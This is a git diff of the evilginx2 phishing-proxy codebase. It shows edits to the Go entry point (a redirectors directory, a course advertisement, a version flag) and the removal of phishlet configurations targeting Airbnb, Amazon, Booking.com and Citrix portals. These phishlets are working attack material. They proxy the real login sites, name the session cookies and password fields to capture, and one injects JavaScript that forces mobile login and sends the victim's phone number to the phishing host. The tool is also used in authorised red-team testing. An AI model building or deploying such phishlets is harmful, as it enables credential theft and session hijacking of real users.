honnef.co/go/tools v0.0.0-20190106161140-3f1c8253044a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
|
||||
honnef.co/go/tools v0.0.0-20190418001031-e561f6794a2a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
|
||||
honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4=
|
||||
honnef.co/go/tools v0.0.1-2019.2.3/go.mod h1:a3bituU0lyd329TUQxRnasdCoJDkEUEAqEt0JzvZhAg=
|
||||
honnef.co/go/tools v0.0.1-2020.1.3/go.mod h1:X/FiERA/W4tHapMX5mGpAtMSVEeEUOyHaw9vFzvIQ3k=
|
||||
honnef.co/go/tools v0.0.1-2020.1.4/go.mod h1:X/FiERA/W4tHapMX5mGpAtMSVEeEUOyHaw9vFzvIQ3k=
|
||||
rsc.io/binaryregexp v0.2.0/go.mod h1:qTv7/COck+e2FymRvadv62gMdZztPaShugOCi3I+8D8=
|
||||
rsc.io/quote/v3 v3.1.0/go.mod h1:yEA65RcK8LyAZtP9Kv3t0HmxON59tX3rD+tICJqUlj0=
|
||||
rsc.io/sampler v1.3.0/go.mod h1:T1hPZKmBbMNahiBKFy5HrXp6adAjACjK9JXDnKaTXpA=
|
||||
|
@ -144,7 +144,7 @@ func format_msg(lvl int, format string, args ...interface{}) string {
|
||||
//msg = color.New(color.Reset, color.FgHiBlue)
|
||||
msg = color.New(color.Reset)
|
||||
case WARNING:
|
||||
sign = color.New(color.FgBlack, color.BgYellow)
|
||||
sign = color.New(color.FgHiYellow, color.BgBlack)
|
||||
//msg = color.New(color.Reset, color.FgYellow)
|
||||
msg = color.New(color.Reset)
|
||||
case ERROR:
|
||||
|
53
main.go
53
main.go
@ -2,6 +2,7 @@ package main
|
||||
|
||||
import (
|
||||
"flag"
|
||||
"fmt"
|
||||
"io/ioutil"
|
||||
"os"
|
||||
"os/user"
|
||||
@ -11,13 +12,16 @@ import (
|
||||
"github.com/kgretzky/evilginx2/core"
|
||||
"github.com/kgretzky/evilginx2/database"
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
|
||||
"github.com/fatih/color"
|
||||
)
|
||||
|
||||
var phishlets_dir = flag.String("p", "", "Phishlets directory path")
|
||||
var templates_dir = flag.String("t", "", "HTML templates directory path")
|
||||
var redirectors_dir = flag.String("t", "", "HTML redirector pages directory path")
|
||||
var debug_log = flag.Bool("debug", false, "Enable debug output")
|
||||
var developer_mode = flag.Bool("developer", false, "Enable developer mode (generates self-signed certificates for all hostnames)")
|
||||
var cfg_dir = flag.String("c", "", "Configuration directory path")
|
||||
var version_flag = flag.Bool("v", false, "Show version")
|
||||
|
||||
func joinPath(base_path string, rel_path string) string {
|
||||
var ret string
|
||||
@ -29,12 +33,28 @@ func joinPath(base_path string, rel_path string) string {
|
||||
return ret
|
||||
}
|
||||
|
||||
func showAd() {
|
||||
lred := color.New(color.FgHiRed)
|
||||
lyellow := color.New(color.FgHiYellow)
|
||||
white := color.New(color.FgHiWhite)
|
||||
message := fmt.Sprintf("%s: %s %s", lred.Sprint("Evilginx Mastery Course"), lyellow.Sprint("https://academy.breakdev.org/evilginx-mastery"), white.Sprint("(learn how to create phishlets)"))
|
||||
log.Info("%s", message)
|
||||
}
|
||||
|
||||
func main() {
|
||||
flag.Parse()
|
||||
|
||||
if *version_flag == true {
|
||||
log.Info("version: %s", core.VERSION)
|
||||
return
|
||||
}
|
||||
|
||||
exe_path, _ := os.Executable()
|
||||
exe_dir := filepath.Dir(exe_path)
|
||||
|
||||
core.Banner()
|
||||
flag.Parse()
|
||||
showAd()
|
||||
|
||||
if *phishlets_dir == "" {
|
||||
*phishlets_dir = joinPath(exe_dir, "./phishlets")
|
||||
if _, err := os.Stat(*phishlets_dir); os.IsNotExist(err) {
|
||||
@ -45,12 +65,12 @@ func main() {
|
||||
}
|
||||
}
|
||||
}
|
||||
if *templates_dir == "" {
|
||||
*templates_dir = joinPath(exe_dir, "./templates")
|
||||
if _, err := os.Stat(*templates_dir); os.IsNotExist(err) {
|
||||
*templates_dir = "/usr/share/evilginx/templates/"
|
||||
if _, err := os.Stat(*templates_dir); os.IsNotExist(err) {
|
||||
*templates_dir = joinPath(exe_dir, "./templates")
|
||||
if *redirectors_dir == "" {
|
||||
*redirectors_dir = joinPath(exe_dir, "./redirectors")
|
||||
if _, err := os.Stat(*redirectors_dir); os.IsNotExist(err) {
|
||||
*redirectors_dir = "/usr/share/evilginx/redirectors/"
|
||||
if _, err := os.Stat(*redirectors_dir); os.IsNotExist(err) {
|
||||
*redirectors_dir = joinPath(exe_dir, "./redirectors")
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -58,8 +78,8 @@ func main() {
|
||||
log.Fatal("provided phishlets directory path does not exist: %s", *phishlets_dir)
|
||||
return
|
||||
}
|
||||
if _, err := os.Stat(*templates_dir); os.IsNotExist(err) {
|
||||
os.MkdirAll(*templates_dir, os.FileMode(0700))
|
||||
if _, err := os.Stat(*redirectors_dir); os.IsNotExist(err) {
|
||||
os.MkdirAll(*redirectors_dir, os.FileMode(0700))
|
||||
}
|
||||
|
||||
log.DebugEnable(*debug_log)
|
||||
@ -100,7 +120,7 @@ func main() {
|
||||
log.Fatal("config: %v", err)
|
||||
return
|
||||
}
|
||||
cfg.SetTemplatesDir(*templates_dir)
|
||||
cfg.SetRedirectorsDir(*redirectors_dir)
|
||||
|
||||
db, err := database.NewDatabase(filepath.Join(*cfg_dir, "data.db"))
|
||||
if err != nil {
|
||||
@ -128,29 +148,28 @@ func main() {
|
||||
}
|
||||
pname := rpname[1]
|
||||
if pname != "" {
|
||||
pl, err := core.NewPhishlet(pname, filepath.Join(phishlets_path, f.Name()), cfg)
|
||||
pl, err := core.NewPhishlet(pname, filepath.Join(phishlets_path, f.Name()), nil, cfg)
|
||||
if err != nil {
|
||||
log.Error("failed to load phishlet '%s': %v", f.Name(), err)
|
||||
continue
|
||||
}
|
||||
//log.Info("loaded phishlet '%s' made by %s from '%s'", pl.Name, pl.Author, f.Name())
|
||||
cfg.AddPhishlet(pname, pl)
|
||||
}
|
||||
}
|
||||
}
|
||||
cfg.LoadSubPhishlets()
|
||||
cfg.CleanUp()
|
||||
|
||||
ns, _ := core.NewNameserver(cfg)
|
||||
ns.Start()
|
||||
hs, _ := core.NewHttpServer()
|
||||
hs.Start()
|
||||
|
||||
crt_db, err := core.NewCertDb(crt_path, cfg, ns, hs)
|
||||
crt_db, err := core.NewCertDb(crt_path, cfg, ns)
|
||||
if err != nil {
|
||||
log.Fatal("certdb: %v", err)
|
||||
return
|
||||
}
|
||||
|
||||
hp, _ := core.NewHttpProxy("", 443, cfg, crt_db, db, bl, *developer_mode)
|
||||
hp, _ := core.NewHttpProxy("", cfg.GetHttpsPort(), cfg, crt_db, db, bl, *developer_mode)
|
||||
hp.Start()
|
||||
|
||||
t, err := core.NewTerminal(hp, cfg, crt_db, db, *developer_mode)
|
||||
|
BIN
media/img/evilginx_mastery.jpg
Normal file
BIN
media/img/evilginx_mastery.jpg
Normal file
Binary file not shown.
After Width: | Height: | Size: 214 KiB |
@ -1,136 +0,0 @@
|
||||
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
|
||||
# PLEASE DO NOT MISUSE THIS PHISHLET.
|
||||
|
||||
|
||||
# Replace 'airbnb.co.uk' with your Server country Domain name of Airbnb.
|
||||
# Login With Email Will Not Work Due To Catpcha Failures.
|
||||
# Respective Javascripts Has been Added in Order to trigger, Login With Mobile Number.
|
||||
|
||||
author: '@AN0NUD4Y'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'airbnb.co.uk', session: true, is_landing: true}
|
||||
- {phish_sub: '', orig_sub: '', domain: 'airbnb.co.uk', session: true, is_landing: false}
|
||||
- {phish_sub: 'muscache', orig_sub: 'a0', domain: 'muscache.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'gstatic', orig_sub: '', domain: 'gstatic.com', session: true, is_landing: false}
|
||||
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{domain}', replace: 'https://{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{domain}', replace: 'https%3A%2F%2F{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'a0', domain: 'muscache.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'a0', domain: 'muscache.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'a0', domain: 'muscache.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: 'www', domain: 'google.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: '', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: '', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.airbnb.co.uk', orig_sub: '', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'a0', domain: 'muscache.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'a0', domain: 'muscache.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'a0', domain: 'muscache.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'google.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.google.com', orig_sub: '', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: '', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: '', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{domain}', replace: 'https://{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'www.google.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{domain}', replace: 'https%3A%2F%2F{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'a0', domain: 'muscache.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'a0', domain: 'muscache.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'a0', domain: 'muscache.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'google.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'gstatic.com', orig_sub: '', domain: 'gstatic.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: '', domain: 'gstatic.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: '', domain: 'gstatic.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https://{domain}', replace: 'https://{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
- {triggers_on: 'gstatic.com', orig_sub: 'www', domain: 'airbnb.co.uk', search: 'https%3A%2F%2F{domain}', replace: 'https%3A%2F%2F{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
|
||||
|
||||
|
||||
auth_tokens:
|
||||
- domain: '.airbnb.co.uk'
|
||||
keys: ['_csrf_token','_aat','abb_fa2','rclu','tzo,opt','_pt','bev','_airbed_session_id','.*,regexp']
|
||||
credentials:
|
||||
username:
|
||||
key: 'Leaked_mobileNumber'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
custom:
|
||||
- key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'www.airbnb.co.uk'
|
||||
path: '/login'
|
||||
js_inject:
|
||||
- trigger_domains: ["www.airbnb.co.uk"]
|
||||
trigger_paths: ["/login","/","/*"]
|
||||
trigger_params: []
|
||||
script: |
|
||||
function get_mobile_login(){
|
||||
document.getElementsByClassName("_1d079j1e")[1].click();
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){ get_mobile_login(); }, 1000);
|
||||
|
||||
function remove_login_buttons() {
|
||||
var elem = document.getElementsByClassName("_p03egf")[0];
|
||||
elem.parentNode.removeChild(elem);
|
||||
var elem1 = document.getElementsByClassName("_p03egf")[1];
|
||||
elem1.parentNode.removeChild(elem1);
|
||||
var elem2 = document.getElementsByClassName("_p03egf")[0];
|
||||
elem2.parentNode.removeChild(elem2);
|
||||
var elem3 = document.getElementsByClassName("_bema73j")[0];
|
||||
elem3.parentNode.removeChild(elem3);
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){ remove_login_buttons(); }, 1000);
|
||||
|
||||
function lp(){
|
||||
var submit = document.querySelectorAll('button[type=submit]')[0];
|
||||
submit.setAttribute("onclick", "sendMobile()");
|
||||
return;
|
||||
}
|
||||
function sendMobile(){
|
||||
var mobile = document.getElementsByName("phoneNumber")[0].value;
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", '/', true);
|
||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
||||
xhr.send("Leaked_mobileNumber="+encodeURIComponent(mobile));
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){ lp(); }, 2000);
|
@ -1,28 +0,0 @@
|
||||
author: '@customsync'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'amazon.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'fls-na', orig_sub: 'fls-na', domain: 'amazon.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'images-na', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', session: false, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.amazon.com', orig_sub: 'www', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'fls-na.amazon.com', orig_sub: 'fls-na', domain: 'amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-iges-amazon.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'images-na.ssl-iamges-amazon.com', orig_sub: 'images-na', domain: 'ssl-images-amazon.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
|
||||
auth_tokens:
|
||||
- domain: '.amazon.com'
|
||||
keys: ['at-main','lc-main','sess-at-main','session-id','session-id-time','session-token','sst-main','ubid-main','x-main','skin','a-ogbcbff']
|
||||
credentials:
|
||||
username:
|
||||
key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'www.amazon.com'
|
||||
path: '/ap/signin?_encoding=UTF8&ignoreAuthState=1&openid.assoc_handle=usflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0'
|
@ -1,27 +0,0 @@
|
||||
author: '@Anonymous'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'accounts.booking' , orig_sub: '' , domain: 'booking.com', session: false, is_landing: true}
|
||||
- {phish_sub: 'account', orig_sub: 'account', domain: 'booking.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'secure' , orig_sub: 'secure' , domain: 'booking.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'www' , orig_sub: '' , domain: 'booking.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'join' , orig_sub: 'join' , domain: 'booking.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'admin' , orig_sub: 'admin' , domain: 'booking.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'q', orig_sub: 'q-cf', domain: 'bstatic.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'r', orig_sub: 'r-cf', domain: 'bstatic.com', session: false, is_landing: false}
|
||||
sub_filters: []
|
||||
auth_tokens:
|
||||
- domain: '.booking.com'
|
||||
keys: ['bkng','.*,regexp']
|
||||
credentials:
|
||||
username:
|
||||
key: ''
|
||||
search: '"login_name":"([^"]*)'
|
||||
type: 'json'
|
||||
password:
|
||||
key: ''
|
||||
search: '"password":"([^"]*)'
|
||||
type: 'json'
|
||||
login:
|
||||
domain: 'account.booking.com'
|
||||
path: '/'
|
@ -1,22 +0,0 @@
|
||||
name: 'Citrix Portal'
|
||||
author: '@424f424f'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'subdomainhere', orig_sub: 'subdomainhere', domain: 'domainhere', session: true, is_landing: true}
|
||||
sub_filters:
|
||||
- {triggers_on: 'domainhere', orig_sub: 'subdomainhere', domain: 'domainhere', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
auth_tokens:
|
||||
- domain: 'domainhere'
|
||||
keys: ['ASP.NET_SessionId','CsrfToken','NSC_AAAC','NSC_DLGE','pwcount']
|
||||
credentials:
|
||||
username:
|
||||
key: 'login'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'passwd'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'subdomainhere.domainhere'
|
||||
path: '/vpn/index.html'
|
@ -1,160 +0,0 @@
|
||||
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
|
||||
# PLEASE DO NOT MISUSE THIS PHISHLET.
|
||||
|
||||
# Don't Forget To set "domain" Params to your domain name (example.com)...
|
||||
#
|
||||
